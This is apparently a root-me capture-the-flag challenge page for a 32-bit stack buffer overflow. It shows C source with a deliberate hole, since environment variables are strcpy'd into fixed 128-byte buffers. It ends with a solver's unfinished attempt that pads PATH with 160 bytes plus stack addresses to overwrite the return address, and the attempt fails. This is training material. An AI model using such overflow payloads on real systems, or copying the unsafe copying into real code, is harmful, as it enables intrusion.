ELF x86: Stack buffer overflow basic 4
root-me challenge: Can you return the env to me pleazzz?
Environment configuration:
PIE Position Independent Executable No
RelRO Read Only relocations No
NX Non-Executable Stack No
ASLR Address Space Layout Randomization No
SF Source Fortification No
SSP Stack-Smashing Protection No
SRC Source code access Yes
Source code:
#include <stdio.h>
#include <stdlib.h>
#include <dirent.h>
#include <string.h>
struct EnvInfo
{
char home[128];
char username[128];
char shell[128];
char path[128];
};
struct EnvInfo GetEnv(void)
{
struct EnvInfo env;
char *ptr;
if((ptr = getenv("HOME")) == NULL)
{
printf("[-] Can't find HOME.\n");
exit(0);
}
strcpy(env.home, ptr);
if((ptr = getenv("USERNAME")) == NULL)
{
printf("[-] Can't find USERNAME.\n");
exit(0);
}
strcpy(env.username, ptr);
if((ptr = getenv("SHELL")) == NULL)
{
printf("[-] Can't find SHELL.\n");
exit(0);
}
strcpy(env.shell, ptr);
if((ptr = getenv("PATH")) == NULL)
{
printf("[-] Can't find PATH.\n");
exit(0);
}
strcpy(env.path, ptr);
return env;
}
int main(void)
{
struct EnvInfo env;
printf("[+] Getting env...\n");
env = GetEnv();
printf("HOME = %s\n", env.home);
printf("USERNAME = %s\n", env.username);
printf("SHELL = %s\n", env.shell);
printf("PATH = %s\n", env.path);
return 0;
}
app-systeme-ch8@challenge02:~$ export PATH=$PATH:`python -c "print 'A'*160 + '\x31\xf9\xff\xbf' + '\x2b\xfb\xff\xbf'"`
app-systeme-ch8@challenge02:~$ ./ch8
[+] Getting env...
[-] Can't find USERNAME.
Need to think some more …